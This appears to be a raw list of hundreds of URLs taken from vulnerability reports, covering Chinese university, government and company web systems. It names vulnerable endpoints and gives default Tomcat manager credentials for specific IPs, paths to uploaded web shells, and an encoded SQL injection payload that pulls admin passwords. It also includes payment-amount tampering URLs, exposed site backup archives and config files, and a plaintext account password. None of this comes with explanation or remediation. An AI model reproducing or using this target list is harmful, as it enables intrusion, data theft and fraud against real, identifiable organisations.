http://sms-service.shopex.cn/index.php?certificate_id= http://www.house5.cn/uploadfile/avatar/1/1/193/180x180.jpg URL:http://test.fh21.com.cn:80//index.php?a=zhun&c=in url:http://ssk.fh21.com.cn/index.php?a=getNewAskList&c=index&m=operation http://news.liupanshui.fang.com/fck低版本的遍历漏洞 http://www.rzfzb.gov.cn/search.php?keyword=1 http://202.112.118.46/index.html http://202.112.118.46/ywcdwz/zxdt2.jsp?zxdt_id=9 URL:http://m.fh21.com.cn/ypk/category/list?category_id=6 http://health.95081.com/jsp/usercheck/useraction!userlogin.action http://xtoa.lbex.com.cn/Default.aspx http://www.glbus.net:8000/ http://oa.chinagas.com.cn/new/List_Admin.aspx?type=10 http://oa.chinagas.com.cn/new/List_Admin.aspx?type=10 http://dl.xxt.hn.chinamobile.com/talkweb/数据割接(勿删)/20140321割接/红塔/36.txt http://114.255.59.61/ https://vpn.njmu.edu.cn/dana/home/index.cgi http://ms.cga.com.cn/Default.aspx http://item.cga.com.cn/images/propImages/aspx.aspx www.nytjj.gov.cn/showword.asp?id=112763 http://221.2.98.74:6080/icrm/loginManager/userLogin_login.do http://xxx.edu.cn/pages/manager/managerAddNManager.jsp http://ecard.sjtu.edu.cn/pages/manager/managerAddNManager.jsp http://www.ecard.ldu.edu.cn/pages/manager/managerAddNManager.jsp http://ecard.ouc.edu.cn/pages/manager/managerAddNManager.jsp http://ecard.xtu.edu.cn/pages/manager/managerAddNManager.jsp湘潭大学 http://ykt.hzau.edu.cn/pages/manager/managerAddNManager.jsp http://id.gzu.edu.cn/pages/manager/managerAddNManager.jsp http://ecard.tyut.edu.cn/pages/manager/managerAddNManager.jsp太原理工大学 http://ecard.sdu.edu.cn/pages/manager/managerAddNManager.jsp山东大学 http://ecard.jxust.cn/pages/pages/manager/managerAddNManager.jsp http://teccard.suda.edu.cn/pages/manager/managerAddNManager.jsp http://xyk.nwu.edu.cn/pages/manager/managerAddNManager.jsp http://ykt.hebut.edu.cn/pages/manager/managerAddNManager.jsp http://ecard.utsz.edu.cn/pages/manager/managerAddNManager.jsp http://ecard.csu.edu.cn/pages/manager/managerAddNManager.jsp 
http://yktcx.njmu.edu.cn/pages/manager/managerAddNManager.jsp http://xyk.jlnu.edu.cn/pages/manager/managerAddNManager.jsp http://202.113.244.71/pages/manager/managerAddNManager.jsp http://ecard.sdwz.cn/pages/manager/managerAddNManager.jsp http://ecard.tust.edu.cn/pages/manager/managerAddNManager.jsp http://www.ecard.sdwu.edu.cn/pages/manager/managerAddNManager.jsp http://218.30.22.96/manage/heyue/yz.php http://60.6.223.142:1100/admin/protected/index.jsp http://v.253q.com:8008 http://y.viiall.com/ http://218.30.22.28:8080/ http://218.30.22.28:8080/phpinfo.php http://218.30.22.28:8080/WWW.rar http://sj.zhubajie.com/ http://www.birtronix.com/gsmrpanel/admin/admin.php http://bsfwt.12366.ha.cn/bsfwt/wsbsfwt/index.html km2.in/xss.swf http://drops.wooyun.org/papers/548 https://202.127.25.227/por/login_psw.csp http://114.80.226.221:8080/homepage/index.action http://hrm.longskysoft.com/homepage/index.action http://ehr.crownbio.com/365hrm/homepage/index.action http://112.65.227.157:8080/homepage/index.action http://gc.cscec8b.com.cn/Prj/index.htm http://www.zgjsj.gov.cn/zhuanti/news.php?typeid=3&page=2 http://www.zgjsj.gov.cn/zhuanti/newsshow.php?id=12 http://apt.178.com/ http://mall.jifentao.com/wwwroot.rar http://mall.jifentao.com/phpMyAdmin http://xuewei.bjmu.edu.cn/idl/idl/ftb.imagegallery.aspx http://121.33.246.167/idl30/idl/ftb.imagegallery.aspx http://202.115.72.1/idl/idl/ftb.imagegallery.aspx http://lib.qfnu.edu.cn:808/idl/ftb.imagegallery.aspx http://xwlw.zju.edu.cn/idl/idl/ftb.imagegallery.aspx http://papers.libmill.com/idl/ftb.imagegallery.aspx http://papers.libmill.com/idl/ftb.imagegallery.aspx http://202.194.153.155/idl/UpLoadimages/mathimages/;ys.asp;.jpg_math.jpg http://210.32.33.160/idl/Check/ftb.imagegallery.aspx http://210.27.181.210/Check/ftb.imagegallery.aspx http://202.194.153.155/idl/Check/ftb.imagegallery.aspx http://papers.libmill.com/Check/ftb.imagegallery.aspx http://xwlw.zju.edu.cn/idl/Check/ftb.imagegallery.aspx 
http://lib.qfnu.edu.cn:808/idl/Check/ftb.imagegallery.aspx http://202.115.72.1/idl/Check/ftb.imagegallery.aspx http://121.33.246.167/idl30/Check/ftb.imagegallery.aspx http://xuewei.bjmu.edu.cn/idl/Check/ftb.imagegallery.aspx http://xuewei.bjmu.edu.cn/idl/Check/ftb.imagegallery.aspx http://xuewei.bjmu.edu.cn/idl/UpLoadimages/mathimages/;ys.asp;.jpg_math.jpg http://www.actc.com.cn/Zh/SixtyExpert/Login.aspx http://zhlzh.mofcom.gov.cn/ http://zhlzh.mofcom.gov.cn/upload/2015/02/23/142469519993869.22789360632558.jsp http://61.237.239.144/ictrcp/ http://61.237.239.144/ictrcp/base/security/userinfo!login.action http://61.237.239.144/ictrcp/ http://www.qfdns.net/ http://www.nxjxbz.com/lyfk.asp http://www.nxzxzs.com/lyfk.asp http://www.nxjxbz.com/lyfk.asp http://www.ystnz88.com/lyfk.asp http://www.nxjxtfkt.com/lyfk.asp http://www.nxmscy.com/lyfk.asp http://www.nxjxtfkt.com/lyfk.asp http://astro.ustc.edu.cn/ http://astro.ustc.edu.cn/list.php?uid=40&fid=53 http://t.ci123.com/wooyun http://www.ztehotel.com/mobile/mhotelgen.aspx?id=ZTE001 url:http://m.7yw.cn/admin_7yw/Guestbook.aspx?Act=Audit&id=559 url:http://61.172.246.134:80/manager/html user:tomcat pass:tomcat http://mp.8228.cn/admin/index.jsp http://localhost/3gcms/index.php?s=guestbook http://angame.login.game.uc.cn/index.php url:http://124.207.3.40:80/manager/html user:admin pass:tomcat http://www.hnrc.gov.cn/request/worklstex.aspx?zylx=0101 http://202.201.152.23:8080/idl30/admin/ftb.imagegallery.aspx http://qhbfm.jiehr.com.cn/admin/ftb.imagegallery.aspx http://211.86.245.155/admin/ftb.imagegallery.aspx http://lib.uir.cn:808/idl/admin/ftb.imagegallery.aspx http://61.167.120.67:8080/IDLWEB//admin/ftb.imagegallery.aspx http://xwlw.zju.edu.cn/idl/admin/ftb.imagegallery.aspx http://202.119.248.241/idl30//admin/ftb.imagegallery.aspx http://210.27.181.210/admin/ftb.imagegallery.aspx http://xuewei.bjmu.edu.cn/idl/admin/ftb.imagegallery.aspx http://219.223.211.23//admin/ftb.imagegallery.aspx 
http://paper.smu.edu.cn:88/idl30//admin/ftb.imagegallery.aspx http://202.115.72.1/idl/admin/ftb.imagegallery.aspx http://papers.libmill.com/admin/ftb.imagegallery.aspx http://202.194.153.155//idl///admin/ftb.imagegallery.aspx http://202.201.152.23:8080/idl30/admin/ftb.imagegallery.aspx http://www.cnemc.cn/news/downLoad.jsp?filePath= http://www.cnemc.cn/news/downLoad.jsp?filePath=news/downLoad.jsp http://111.47.120.1:8081/adminAction!login.action url:http://59.46.220.116:80/manager/html user:admin pass:admin url:http://59.54.202.37:80/manager/html user:admin pass:admin url:http://125.94.215.96:80/manager/html user:admin pass:admin https://125.94.215.96/PVISManager/login.action http://www.ccwh.gov.cn/serv.php?class=1 url:http://oneniceapp.com/photo/index/b7f9e1a3cc*****7877bc86a9093c http://211.68.208.72/gmis_tjwgy/Byyxwgl/lxtgxxlradd.aspx http://gs.njfu.edu.cn/Gmis/Byyxwgl/lxtgxxlradd.aspx http://202.206.151.85:8080/Gmis/Byyxwgl/lxtgxxlradd.aspx http://yjs.cdutcm.edu.cn:8080/Gmis/Byyxwgl/lxtgxxlradd.aspx http://graduate.hnust.cn/Gmis/Byyxwgl/lxtgxxlradd.aspx http://202.203.225.17:8080/Gmis/Byyxwgl/lxtgxxlradd.aspx http://218.75.27.177/Gmis/Byyxwgl/lxtgxxlradd.aspx http://yjsy.wmu.edu.cn:8080/Gmis/Byyxwgl/lxtgxxlradd.aspx http://101.76.99.20/Gmis/Byyxwgl/lxtgxxlradd.aspx http://61.187.179.68:8080/Gmis/Byyxwgl/lxtgxxlradd.aspx http://yjsy.wzmc.edu.cn:8080/Gmis/Byyxwgl/lxtgxxlradd.aspx http://210.43.126.80:8080/Gmis/Byyxwgl/lxtgxxlradd.aspx http://211.64.205.214/Gmis/Byyxwgl/lxtgxxlradd.aspx http://211.64.205.214/Gmis/Byyxwgl/lxtgxxlradd.aspx shell:http://211.64.205.214/Gmis/Byyxwgl/UploadFiles/1.aspx http://210.43.126.80:8080/Gmis/Byyxwgl/lxtgxxlradd.aspx shell:http://210.43.126.80:8080/Gmis/Byyxwgl/UploadFiles/1.aspx http://www.w-net.cn/wwwroot.zip http://202.116.161.3:8080/redir.php http://202.117.3.106:8088/redir.php http://124.160.64.114:11660/redir.php http://safe.zjnu.edu.cn/redir.php http://jczx.split.hdu.edu.cn/redir.php http://219.244.166.226:8080/redir.php 
http://202.116.161.3:8080/redir.php http://live.sports.ifeng.com/index.shtml http://www.xinli001.com/user/article/post/ http://ec.crcc.cn:8000/logonAction.do http://www.ncist.edu.cn/kexue/news/read.asp?id=826 http://www.hbwjyy.com/ http://www.hbwjyy.com/search.aspx?t=1&k=rgrg%27 www.zcom.com/shop/ www.zcom.com/_alias/configs/conn.inc.php http://yjsy.wzmc.edu.cn:8080/gmis/xjgl/changedsView.aspx http://yjsy.wmu.edu.cn:8080/gmis/xjgl/changedsView.aspx http://202.203.225.17:8080/Gmis/xjgl/changedsView.aspx http://211.64.205.214/gmis/xjgl/changedsView.aspx http://210.43.126.80:8080/Gmis/xjgl/changedsView.aspx http://101.76.99.20/Gmis/xjgl/changedsView.aspx http://61.187.179.68:8080/Gmis/xjgl/changedsView.aspx http://yjsy.wzmc.edu.cn:8080/gmis/xjgl/changedsView.aspx cn:8080 http://yjsy.wzmc.edu.cn:8080 http://lyczkj.gov.cn/cx/ http://lyczkj.gov.cn/cx/admin/login.asp http://202.114.177.191/gmis/zs/sczgscbinfoadd.aspx http://gs.njfu.edu.cn/gmis/zs/sczgscbInfoAdd.aspx http://202.206.151.85:8080/gmis/zs/sczgscbInfoAdd.aspx http://yjsy.wzmc.edu.cn:8080/gmis/zs/sczgscbInfoAdd.aspx http://218.75.27.177/gmis/zs/sczgscbInfoAdd.aspx http://202.114.177.191/gmis/zs/sczgscbInfoAdd.aspx http://yjsy.wmu.edu.cn:8080/gmis/zs/sczgscbInfoAdd.aspx http://yjs.cdutcm.edu.cn:8080/Gmis/zs/sczgscbInfoAdd.aspx http://yjs.hnu.cn/gmis/zs/sczgscbInfoAdd.aspx http://yjsc.hunnu.edu.cn/gmis/zs/sczgscbInfoAdd.aspx http://218.195.64.26:8080/gmis/zs/sczgscbInfoAdd.aspx http://211.64.205.214/gmis/zs/sczgscbInfoAdd.aspx http://211.64.205.214/gmis/zs/sczgscbInfoAdd.aspx http://211.64.205.214/gmis/ZS/uploadfiles/1.aspx http://218.195.64.26:8080/gmis/zs/sczgscbInfoAdd.aspx http://218.195.64.26:8080/gmis/ZS/uploadfiles/1.aspx www.taotiba.com cn:8000/logi/ http://logistics.auchan.com.cn:8000/manager/html http://member.aili.com/note_/note-228293 http://member.aili.com/note_/note-228293 http://www.bdnmg.com:8080/gps/mobile/index.html http://www.neoby.com/ http://www.neoby.com/ajax?action=Level&cmd=Get&storeid=5575 
http://220.163.100.151:9002/Ajax.ashx?action=doLogin&loginName=1&password=1&noCache=0.03266645718449479 http://220.163.100.151:9002/ http://220.163.100.151:9002/ http://www.nongyou.com.cn/ http://61.133.119.187:8091/jwhxq.aspx?id= http://222.135.76.147:8200/jwhxq.aspx?id= http://222.135.127.190:7200/jwhxq.aspx?id= http://221.2.149.47:8200/jwhxq.aspx?id= http://218.59.205.41:8053/jwhxq.aspx?id= http://jwh.tanljgzx.gov.cn/jwhxq.aspx?id= http://221.2.171.59:8200/jwhxq.aspx?id= http://218.56.159.98:8001/jwhxq.aspx?id= http://123.134.189.60:8016/jwhxq.aspx?id= http://218.56.159.98:8001/jwhxq.aspx?id= url:http://106.39.52.30:80/manager/html user:admin pass:admin http://www.anlice.com/ceping/HouAdmin/GLGWUsers.aspx http://www.tobdclub.com/ceping/HouAdmin/GLGWUsers.aspx http://xt100.cn//ceping/HouAdmin/GLGWUsers.aspx http://www.china21nec.com/ceping/HouAdmin/GLGWUsers.aspx http://www.gzedu100.com/ceping/HouAdmin/GLGWUsers.aspx http://www.gzedu100.com/ceping/HouAdmin/GLGWUsers.aspx http://www.china21nec.com/ceping/HouAdmin/GLGWUsers.aspx http://fzedu.net.cn/ceping/fckeditor/editor/filemanager/connectors/test.html# http://www.8409409.com/ceping/fckeditor/editor/filemanager/connectors/test.html http://www.dghgjy.com//ceping/fckeditor/editor/filemanager/connectors/test.html http://xt100.cn/ceping/fckeditor/editor/filemanager/connectors/test.html http://www.tobdclub.com/ceping/fckeditor/editor/filemanager/connectors/test.html http://www.anlice.com//ceping/fckeditor/editor/filemanager/connectors/test.html http://xitong.mingjuan.net/ceping/fckeditor/editor/filemanager/connectors/test.html http://xitong.mingjuan.net/ceping/fckeditor/editor/filemanager/connectors/test.html http://xitong.mingjuan.net/ceping/Uploads/file/1.asp/ccc.jpg http://www.netistate.com/bbs/uc_server http://182.92.99.5:8080/index.action http://210.32.33.160/idl/Check/Check_login.aspx http://202.194.153.155/idl/Check/Check_login.aspx http://papers.libmill.com/Check/Check_login.aspx 
http://xwlw.zju.edu.cn/idl/Check/Check_login.aspx http://202.115.72.1/idl/Check/Check_login.aspx http://219.244.185.22/idl/Check/Check_login.aspx http://219.244.185.22 http://203.195.187.159:9090/ http://www.longmaster.com.cn/www.rar http://gamedb.766.com/sm/site/view/hero_id/1'注入点 http://www.realesoft.com/about/news/news_view.php?id=213 http://hxfc.qiwei.com/wxhtgl http://env.bnu.edu.cn/morenews.php?id=1 http://env.bnu.edu.cn/morenews.php?id=1 http://sqlmap.org http://cgdcwz.com/portalnew/user/login.action http://bk.gmw.cn/index.php?edition-compare-1 http://211.64.205.214///Gmis/xjgl/ptslist.aspx http://yjsy.wzmc.edu.cn:8080/Gmis/xjgl/ptslist.aspx http://202.203.225.17:8080//Gmis/xjgl/ptslist.aspx http://yjsy.wmu.edu.cn:8080//Gmis/xjgl/ptslist.aspx http://210.43.126.80:8080/Gmis/xjgl/ptslist.aspx http://101.76.99.20//Gmis/xjgl/ptslist.aspx http://61.187.179.68:8080/Gmis/xjgl/ptslist.aspx http://218.75.27.177//Gmis/xjgl/ptslist.aspx http://218.75.27.177//Gmis/xjgl/ptslist.aspx http://218.75.27.177 http://www.strongsoft.net/DMenu.aspx http://shzh.wlfx.gov.cn http://218.86.6.48:3505 http://yj.yywater.gov.cn http://222.216.218.28:8088 http://219.159.102.99:8088 http://218.86.96.98:3505 http://111.12.51.221:8088 http://222.242.107.62:4000 http://fxb.lucheng.gov.cn http://183.233.205.85:9001 http://222.83.214.58:8088 http://219.159.239.96:8088 http://shzh.wlfx.gov.cn/report/ReportMain.aspx http://218.86.6.48:3505/report/ReportMain.aspx http://yj.yywater.gov.cn/report/ReportMain.aspx http://222.216.218.28:8088/report/ReportMain.aspx http://219.159.102.99:8088/report/ReportMain.aspx http://218.86.96.98:3505/report/ReportMain.aspx http://111.12.51.221:8088/report/ReportMain.aspx http://222.242.107.62:4000//report/ReportMain.aspx http://fxb.lucheng.gov.cn/report/ReportMain.aspx http://183.233.205.85:9001/report/ReportMain.aspx http://222.83.214.58:8088/report/ReportMain.aspx http://219.159.239.96:8088/report/ReportMain.aspx 
http://222.83.214.58:8088/report/AjaxHandle/StationChoose/StationTree.ashx?STTP=%27KKK%27,%27DD%27,%27DD_R%27,%27PP%27,%27RR%27,%27MM%27,%27ZQ%27,%27ZQ_R%27,%27RR_R%27,%27TT_R%27,%27TT%27&ADCD=&search=1&RadioType=Radio_QY&ReportID=Report11&_=1423816421920 http://www.hjsoft.com.cn/ http://www.hjsoft.com.cn/2525/1040/index.shtml www.njncc.com:8089/templates/index/hrlogon.jsp renshiguanli.sdflc.com/templates/index/hrlogon.jsp hr.bjn3cc.com/templates/index/hrlogon.jsp cn:8088/templates/index/hrlogon.jsp com:9999/templates/index/hrlogon.jsp ehr.shimaoco.com/templates/index/hrlogon.jsp hr.bmec.net/templates/templates/index/hrlogon.jsp hr.gxjgjt.com/templates/index/hrlogon.jsp ehr.hongkun.com.cn/templates/index/hrlogon.jsp www.cnbmehr.com:8080/templates/index/hrlogon.jsp cn:8585/templates/index/hrlogon.jsp ehr.topsearch.com.hk/templates/index/hrlogon.jsp intranet.topsearch.com.hk/templates/index/hrlogon.jsp cn:8089/templates/index/hrlogon.jsp http://sce.h3c.com/sce/shell.jsp http://www.wooyun.org/bugs/wooyun-2015-098206/trace/9d66279a2d19108acd5ebfed4218ffd0 http://cn.mall-builder.com http://220.248.229.53:28080/ http://www.wooyun.org/bugs/wooyun-2010-098215/trace/6747e9d513efe48d1368f9ede343dae3 http://cn.mall-builder.com/,我的账号:bklm2密码12345678 http://cn.mall-builder.com/shop.php?uid=965,成功弹窗~ http://www.wooyun.org/bugs/wooyun-2010-098221/trace/4913bbb4dc36be483f6b589bfc4faca9 http://cn.mall-builder.com/shop.php?uid=965,这里看到是弹窗弹不出的 http://www.airmacau.com.tw:8086/about/news_articles.asp?id=55 http://www.airmacau.com.tw:8086/holidays/hotel_detail.asp?route=mfm&seq=3 http://www.airmacau.com.tw/tips/tips_intro.asp?unqid=13 http://220.249.191.174/FjServer/fjserver/userAction!userLogin.action http://www.haowan123.com/ http://www.haowan123.com/index.php?r=service/index http://www.haowan123.com/index.php?r=service/index/account http://wap.caitiyu.com/ http://113.200.188.210:18888/NetHallSelfServiceSX/netHallSelfServiceKt.action http://www.jucclub.com/manage/login.asp 
http://www.jucclub.com/manage/login.asp http://www.gclsgsk.com/manage/desktop.asp http://www.jsyhgc.com/manage/login.asp http://www.lywmw.com/manage/login.asp http://nsjysz.com/manage/login.asp http://www.lyty88.com/manage/login.asp http://**.**.**/back.jsp url:http://www.kf.ha.stats.gov.cn:8081/cms/wcm/login.jsp http://www.zz185.com/list_new.asp?spe_id=292 http://www.zz185.com/news.asp?id=672 http://www.zz185.com/list_new.asp?spe_id=292为例测试: http://www.zz185.com/list_new.asp?spe_id=292 http://www.dadoubanzi.com/search/index.php?key=88952634&imageField=88952634&myord=uptime&myshownums=20存在注入,数据库泄露。 http://dealer.mercedes-benz.com.cn/admin/ http://www.hua.com/product/4050001.html http://www.hua.com/shopping/Success.asp?lq3_status=no&lq3_code=&lq3_sum=0&gmrid=9445886&order_amount=1&payment= http://www.hua.com/shopping/payment/alipaynew/alipayapi.asp?OrderID=9445886&OrderAmount=25 http://www.hua.com/shopping/payment/alipaynew/alipayapi.asp?OrderID=9445886&OrderAmount=1 http://www.js11183.com/ckplayer/ctvPlay.jsp?id=72 http://www.keruyun.com/customerCase.html https://github.com/flftfqwxf/keruyun https://github.com/silence52168/MyCodeSpace/blob/master/CalmRouter_pro/profiles/dev/config.properties http://t.hb.189.cn/ http://t.hb.189.cn/index.php?g=wap&token=fwbxug1420513501 http://www.hljmb.gov.cn/fujian/ http://www.hljmb.gov.cn/fujian/foo1__%b8%bd%bc%fe1.php http://epp.dell-brand.com http://epp.dell-brand.com/user.php?act=is_registered&username=%ce%27%20and%201=1%20union%20select%201%20and%20%28select%201%20from%28select%20count%28*%29,concat%28%28Select%20concat%280x5b,user_name,0x3a,password,0x5d%29%20FROM%20ecs_admin_user%20limit%200,1%29,floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29%20%23 http://bec.pigai.org/ http://bec.pigai.org/index.php?bmsg=111 http://think.lenovo.com.cn http://www.jishimedia.com/tplt/xl201106301142338.jsp?infoid=11132&cid=270 http://www.jishimedia.com/tplt/xl2011063011314194.jsp?infoid=13775&cid=949 
http://211.68.208.72/gmis_tjwgy/jxsgl/fbrcxxedit.aspx?id=1 http://gs.njfu.edu.cn/Gmis/jxsgl/fbrcxxedit.aspx?id=1 http://202.206.151.85:8080/Gmis/jxsgl/fbrcxxedit.aspx?id=1 http://yjs.cdutcm.edu.cn:8080/Gmis/jxsgl/fbrcxxedit.aspx?id=1 http://graduate.hnust.cn/Gmis/jxsgl/fbrcxxedit.aspx?id=1 http://202.203.225.17:8080/Gmis/jxsgl/fbrcxxedit.aspx?id=1 http://218.75.27.177//Gmis/jxsgl/fbrcxxedit.aspx?id=1 http://yjsy.wmu.edu.cn:8080/Gmis/jxsgl/fbrcxxedit.aspx?id=1 http://101.76.99.20////Gmis/jxsgl/fbrcxxedit.aspx?id=1 http://61.187.179.68:8080////Gmis/jxsgl/fbrcxxedit.aspx?id=1 http://yjsy.wzmc.edu.cn:8080/Gmis/jxsgl/fbrcxxedit.aspx?id=1 http://210.43.126.80:8080//Gmis/jxsgl/fbrcxxedit.aspx?id=1 http://211.64.205.214//Gmis/jxsgl/fbrcxxedit.aspx?id=1 http://211.64.205.214//Gmis/jxsgl/fbrcxxedit.aspx?id=1 http://210.43.126.80:8080//Gmis/jxsgl/fbrcxxedit.aspx?id=1 http://**.**.**/admin/passport/signin.shtml http://www.yohobuy.com/home/userpwd http://www.yohobuy.com/home/userpwd/modpwd http://www.yohobuy.com/home/userpwd/modpwd http://sz.bendibao.com/suggest/suggest.htm。 http://mercury.csair.com/cn/index.shtml http://www.csairholiday.com/ http://register.csairholiday.com/casUserManager/user/register.do?mhd=register可以登陆南航团购的页面http://www.4006695539.com/tuan/module/newgroupon/groupOnAction.do?mhd=productList这个页面 http://211.68.208.72/gmis_tjwgy/zs/fbzsjzInfoadd.aspx http://gs.njfu.edu.cn/Gmis/zs/fbzsjzInfoadd.aspx http://202.206.151.85:8080/Gmis/zs/fbzsjzInfoadd.aspx http://yjs.cdutcm.edu.cn:8080/Gmis/zs/fbzsjzInfoadd.aspx http://graduate.hnust.cn/Gmis/zs/fbzsjzInfoadd.aspx http://202.203.225.17:8080/Gmis/zs/fbzsjzInfoadd.aspx http://218.75.27.177//Gmis/zs/fbzsjzInfoadd.aspx http://yjsy.wmu.edu.cn:8080/Gmis/zs/fbzsjzInfoadd.aspx http://101.76.99.20////Gmis/zs/fbzsjzInfoadd.aspx http://61.187.179.68:8080////Gmis/zs/fbzsjzInfoadd.aspx http://yjsy.wzmc.edu.cn:8080/Gmis/zs/fbzsjzInfoadd.aspx http://210.43.126.80:8080//Gmis/zs/fbzsjzInfoadd.aspx 
http://211.64.205.214//Gmis/zs/fbzsjzInfoadd.aspx http://211.64.205.214//Gmis/zs/fbzsjzInfoadd.aspx http://211.64.205.214/Gmis/zs/uploadfiles/wooyun.aspx http://210.43.126.80:8080//Gmis/zs/fbzsjzInfoadd.aspx http://210.43.126.80:8080/Gmis/zs/uploadfiles/wooyun.aspx http://groupoa.tcl.com/tcl/Infor/InforManage.nsf?opendatabase help.u17.com/index.php?edition-compare-1 http://dev.56.com/wiki/edition-compare-101.html http://bbs.ifeng.com/talk/special/index.shtml a05:55PM http://office.zhongnangroup.cn http://www.cthhmu.com/news/shownews.php?id=2213&classid=26 http://wenda.pchouse.com.cn/geren/35264279 http://wenda.pchouse.com.cn/geren/35264279 http://canyin.3158.cn/pinlun/?id=1427&formid=hotshop http://202.198.141.46:8088/k3/list.aspx?key=123456&f_jb=123456&f_cc=123456&f_year=123456 http://59.72.151.21:1100/k3/list.aspx?key=123456&f_jb=123456&f_cc=123456&f_year=123456 http://sync.nefu.edu.cn/k3/list.aspx?key=123456&f_jb=123456&f_cc=123456&f_year=123456 http://58.40.126.65/k3/list.aspx?key=123456&f_jb=123456&f_cc=123456&f_year=123456 http://219.141.106.225/k3/list.aspx?key=123456&f_jb=8895263&f_cc=123456&f_year=123456 http://online.nefu.edu.cn/k3/list.aspx?key=123456&f_jb=123456&f_cc=123456&f_year=123456 http://210.26.85.211/k3/list.aspx?key=123456&f_jb=123456&f_cc=123456&f_year=123456 http://210.40.3.220/k3/list.aspx?key=123456&f_jb=123456&f_cc=123456&f_year=123456 http://202.198.141.46:8088/k3/list.aspx?key=123456&f_jb=123456&f_cc=123456&f_year=123456 http://gxzy.hnadl.cn/k3/list.aspx?key=123456&f_jb=123456&f_cc=123456&f_year=123456 http://211.87.190.13:8888/k3/list.aspx?key=123456&f_jb=123456&f_cc=123456&f_year=123456 http://sync.hnadl.cn/k3/list.aspx?key=123456&f_jb=123456&f_cc=123456&f_year=123456 http://202.197.127.113/k3/list.aspx?key=123456&f_jb=123456&f_cc=123456&f_year=123456 http://202.197.127.113/k3/list.aspx?key=123456&f_jb=123456&f_cc=123456&f_year=123456 http://211.87.190.13:8888/k3/list.aspx?key=123456&f_jb=123456&f_cc=123456&f_year=123456 
http://59.72.151.21:1100/k4/list.aspx?key=11111 http://58.40.126.65/k4/list.aspx?key=11111 http://202.198.141.46:8088/k4/list.aspx?key=11111 http://online.nefu.edu.cn//k4/list.aspx?key=11111 http://219.141.106.225//k4/list.aspx?key=11111 http://sync.nefu.edu.cn//k4/list.aspx?key=11111 http://sync.hnadl.cn//k4/list.aspx?key=11111 http://202.197.127.113//k4/list.aspx?key=11111 http://210.26.85.211//k4/list.aspx?key=11111 http://210.40.3.220//k4/list.aspx?key=11111 http://gxzy.hnadl.cn//k4/list.aspx?key=11111 http://211.87.190.13:8888//k4/list.aspx?key=11111 http://211.87.190.13:8888//k4/list.aspx?key=11111 http://210.40.3.220//k4/list.aspx?key=11111 http://www.dzsey.com/sywebeditor/upimg.asp http://www.dzsey.com/syWebEditor/dot4.asp http://www.suqianlawyer.com//sywebeditor/upimg.asp http://www.wybwy.com/sywebeditor/upimg.asp http://www.hhjw321.cn/sywebeditor/upimg.asp http://www.weiye666.com/sywebeditor/upimg.asp http://www.cctv78.cn/sywebeditor/upimg.asp http://www.holylight.com.cn/sywebeditor/upimg.asp http://www.zhubian88.cn/sywebeditor/upimg.asp url:http://www.dhac.com.cn/member/mainAction!queryMainInfo.action http://admin.noahedu.com/cms/user/login.action http://www.zqplan.gov.cn/ls/lvd_readnews.asp?id=1444 http://www.txwl.cn/ http://210.32.33.160/idl/Check/GetSubFileList.aspx?StuID=469 http://219.223.211.23/Check/GetSubFileList.aspx?StuID=469 http://xwlw.zju.edu.cn/idl/Check/GetSubFileList.aspx?StuID=469 http://210.27.181.210/Check/GetSubFileList.aspx?StuID=469 http://202.194.153.155/idl/Check/GetSubFileList.aspx?StuID=469 http://202.197.107.11:86/idl30/Check/GetSubFileList.aspx?StuID=469 http://202.115.72.1/idl/Check/GetSubFileList.aspx?StuID=469 http://xuewei.bjmu.edu.cn/idl/Check/GetSubFileList.aspx?StuID=469 http://lib.qfnu.edu.cn:808/idl/Check/GetSubFileList.aspx?StuID=469 http://202.115.72.1/idl/Check/GetSubFileList.aspx?StuID=469 http://202.112.181.252/idl/Check/GetSubFileList.aspx?StuID=469 http://202.112.181.252/idl/Check/GetSubFileList.aspx?StuID=469 
http://210.32.33.160/idl/admin/admin_login.aspx http://219.223.211.23/admin/admin_login.aspx http://xwlw.zju.edu.cn/idl/admin/admin_login.aspx http://210.27.181.210/admin/admin_login.aspx http://202.194.153.155/idl/admin/admin_login.aspx http://202.197.107.11:86/idl30/admin/admin_login.aspx http://202.115.72.1/idl/admin/admin_login.aspx http://xuewei.bjmu.edu.cn/idl/admin/admin_login.aspx http://lib.qfnu.edu.cn:808/idl/admin/admin_login.aspx http://202.115.72.1/idl/admin/admin_login.aspx http://202.112.181.252/idl/admin/admin_login.aspx http://lib.uir.cn:808/idl/admin/admin_login.aspx http://202.112.181.252 http://221.1.104.11:8011/ExtWebModels/WebFront/ShowBusiness.aspx?id= http://221.2.171.59:8300/ExtWebModels/WebFront/ShowBusiness.aspx?id= http://demo.inongyou.cn/ExtWebModels/WebFront/ShowBusiness.aspx?id= http://rctdlz.cn/ExtWebModels/WebFront/ShowBusiness.aspx?id= http://60.2.214.118:8088/ExtWebModels/WebFront/ShowBusiness.aspx?id= http://121.17.2.52/ExtWebModels/WebFront/ShowBusiness.aspx?id= http://61.186.154.210:8088/ExtWebModels/WebFront/ShowBusiness.aspx?id= http://221.1.104.11:8011/ExtWebModels/WebFront/ShowCompanyInfo.aspx?id= http://221.2.171.59:8300/ExtWebModels/WebFront/ShowCompanyInfo.aspx?id= http://demo.inongyou.cn/ExtWebModels/WebFront/ShowCompanyInfo.aspx?id= http://rctdlz.cn/ExtWebModels/WebFront/ShowCompanyInfo.aspx?id= http://60.2.214.118:8088/ExtWebModels/WebFront/ShowCompanyInfo.aspx?id= http://121.17.2.52/ExtWebModels/WebFront/ShowCompanyInfo.aspx?id= http://61.186.154.210:8088/ExtWebModels/WebFront/ShowCompanyInfo.aspx?id= http://sz.fangdr.com/admin/index.jsp http://sz.fangdr.com/ http://cs.fangdr.com/ http://wh.fangdr.com/ http://dg.fangdr.com/ http://hz.fangdr.com/ http://pesoft.pesoft.org/frame/page/userLogin.aspx http://www.hbhc12333.gov.cn/hbwz/qtpage/hdjl/zxzx_ckhf.jsp?zxlb=01 http://www.henanrd.gov.cn/hnrd/article_content.jsp?TID=20111211145533421387043&ColumnID=105 http://www.henanrd.gov.cn/stdcommittee12.5/index.jsp?CId=421 
